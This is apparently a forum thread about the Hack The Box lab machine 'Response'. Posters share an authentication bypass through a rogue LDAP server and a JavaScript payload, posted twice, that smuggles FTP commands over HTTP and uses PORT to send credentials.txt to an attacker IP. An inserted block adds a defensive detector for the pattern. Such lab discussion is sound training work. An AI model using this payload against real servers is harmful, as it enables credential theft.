Response - HTB [Discussion]
(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?


How do you interact with the chat app, because it needs JS enabled and is not accessible from outside the machine? You can get to the page only from the vuln with the digest stuff. I am at the ZIP point but cannot find anything interesting apart from the gu***:gu*** creds.
Reply
(May 27, 2022, 11:34 AM)pacholingoso Wrote:
(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?


How do you interact with the chat app, because it needs JS enabled and is not accessible from outside the machine? You can get to the page only from the vuln with the digest stuff. I am at the ZIP point but cannot find anything interesting apart from the gu***:gu*** creds.


I wrote a Python script with a port listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then sends the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.
Reply
(May 27, 2022, 06:21 PM)Exa Wrote:
(May 27, 2022, 11:34 AM)pacholingoso Wrote:
(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?


How do you interact with the chat app, because it needs JS enabled and is not accessible from outside the machine? You can get to the page only from the vuln with the digest stuff. I am at the ZIP point but cannot find anything interesting apart from the gu***:gu*** creds.


I wrote a Python script with a post listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then sends the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.


Do you have an application in your browser? I wrote the code to interact with that, lol. As a result, I am authorized under the username admin. I got strange access creds for FTP, but I cannot connect to it.
Reply
(May 27, 2022, 09:16 PM)vitalykht Wrote:
(May 27, 2022, 06:21 PM)Exa Wrote:
(May 27, 2022, 11:34 AM)pacholingoso Wrote:
(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?


How do you interact with the chat app, because it needs JS enabled and is not accessible from outside the machine? You can get to the page only from the vuln with the digest stuff. I am at the ZIP point but cannot find anything interesting apart from the gu***:gu*** creds.


I wrote a Python script with a post listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then sends the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.


Do you have an application in your browser? I wrote the code to interact with that, lol. As a result, I am authorized under the username admin. I got strange access creds for FTP, but I cannot connect to it.


To be authorized as admin, I intercepted the login request with Burp and changed the authserver to my own IP. For the incoming connection on port 389 I set up an LDAP server to approve that authentication attempt.
Reply
Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?
Reply
(May 29, 2022, 01:06 PM)Internetdreams Wrote: https://www.serv-u.com/resource/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command#:~:text=PORT%20FTP%20command-,PORT%20FTP%20command,during%20%22active%22%20mode%20transfers


(May 29, 2022, 10:09 AM)Exa Wrote: Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://ip:port/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
    if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
    }
}
// Request body: FTP commands, one per line (a template literal keeps the line breaks valid)
xhr.send(`USER ftpusername
PASS ftppassword
PORT 10,10,14,12,19,15
RETR credentials.txt
`);
</script>


Thanks a lot, that worked! I really appreciate your help.

For a directory listing, I sent the LIST command instead of the RETR command.
In a second run, I sent RETR creds.txt.
Reply
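Added example, not written by any poster in this thread: a defender-side check for the two anomalies the script above leaves on an FTP control channel, namely HTTP request and header lines arriving as FTP commands, and a PORT argument naming a host other than the connected client. The peer address, the Host value and the one-line-per-command log format are constructed assumptions.

```python
import re
from ipaddress import ip_address

HTTP_REQUEST_LINE = re.compile(r"^(GET|POST|PUT|HEAD|OPTIONS|DELETE) \S+ HTTP/\d\.\d$")
HTTP_HEADER = re.compile(r"^[A-Za-z][A-Za-z0-9-]*: ")
PORT_CMD = re.compile(r"^PORT (\d{1,3}(?:,\d{1,3}){5})$", re.IGNORECASE)

def decode_port(arg):
    """Decode 'h1,h2,h3,h4,p1,p2' into (ip, port); port = p1*256 + p2."""
    parts = [int(p) for p in arg.split(",")]
    if any(p > 255 for p in parts):
        raise ValueError("octet out of range")
    return ip_address(".".join(map(str, parts[:4]))), parts[4] * 256 + parts[5]

def inspect_session(peer_ip, lines):
    """Return (line_no, finding) pairs for one FTP control connection."""
    peer = ip_address(peer_ip)
    findings = []
    for n, raw in enumerate(lines, 1):
        line = raw.rstrip("\r\n")
        if HTTP_REQUEST_LINE.match(line):
            findings.append((n, "http-request-line"))
        elif HTTP_HEADER.match(line):
            findings.append((n, "http-header"))
        elif (m := PORT_CMD.match(line)):
            try:
                ip, port = decode_port(m.group(1))
            except ValueError:
                findings.append((n, "port-malformed"))
                continue
            # Active-mode data connection aimed at a host other than the client
            if ip != peer:
                findings.append((n, f"port-foreign-target {ip}:{port}"))
    return findings

# Constructed sample: what an FTP server would log if a browser POSTed the body above
SAMPLE_PEER = "172.18.0.5"  # assumed address of the connecting client
SAMPLE = [
    "POST / HTTP/1.1",
    "Host: 172.18.0.7:2121",
    "Content-Type: application/x-www-form-urlencoded",
    "",
    "USER ftpusername",
    "PASS ftppassword",
    "PORT 10,10,14,12,19,15",
    "RETR credentials.txt",
]

if __name__ == "__main__":
    for finding in inspect_session(SAMPLE_PEER, SAMPLE):
        print(finding)
```

An FTP server that closes the control connection on the first HTTP request line, and refuses PORT targets that differ from the peer address, stops this pattern before any command is executed.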
(May 29, 2022, 01:06 PM)Internetdreams Wrote: https://www.serv-u.com/resource/tutorial/pasv-response-epsv-port-pbsz-rein-ftp-command#:~:text=PORT%20FTP%20command-,PORT%20FTP%20command,during%20%22active%22%20mode%20transfers


(May 29, 2022, 10:09 AM)Exa Wrote: Answering "yes" to bob, he gives the IP address and credentials for an FTP server.

Is it possible to download files via FTP using JavaScript?

<script>
var xhr = new XMLHttpRequest();
xhr.open("POST", 'http://ip:port/', true);
xhr.setRequestHeader("Content-Type", "application/x-www-form-urlencoded");
xhr.onreadystatechange = function() {
    if (this.readyState === XMLHttpRequest.DONE && this.status === 200) {
    }
}
// Request body: FTP commands, one per line (a template literal keeps the line breaks valid)
xhr.send(`USER ftpusername
PASS ftppassword
PORT 10,10,14,12,19,15
RETR credentials.txt
`);
</script>


Oh, I appreciate it, thank you. I totally forgot that way.
Reply
Anyone have progress on Response root?
Reply
(May 27, 2022, 06:21 PM)Exa Wrote:
(May 27, 2022, 11:34 AM)pacholingoso Wrote:
(May 25, 2022, 06:38 PM)Exa Wrote: I found a username and password in the ZIP file. This can be used to login to the chat application.

I also found that the login request contains this authserver parameter, which can be modified to login as any user.

Next I found that I can send a link like http://10.10.xxx.xxx/ to a certain user and he will then connect to my web server. Does anyone know the next step from here?


How do you interact with the chat app, because it needs JS enabled and is not accessible from outside the machine? You can get to the page only from the vuln with the digest stuff. I am at the ZIP point but cannot find anything interesting apart from the gu***:gu*** creds.


I wrote a Python script with a port listener on port 80. It accepts GET and POST requests. For any such request, it retrieves the corresponding digest and then sends the request to proxy.response.htb. Now I direct Firefox to the Python port and I can normally use the chat application.


I also created a Python script to redirect the traffic to the proxy, but I am having issues with the WebSocket Upgrade. I can see three requests being made but the last one fails with: unknown Session ID...

Also: it seems like the POST request is always returning ok, even putting trash in...
Reply
(June 5, 2022, 02:53 AM)F4nny Wrote: Anyone have progress on Response root?


Hey man, I'm stuck in the chat.response.htb, I can't access it. Can you tell me how you get the url_digest?
Reply

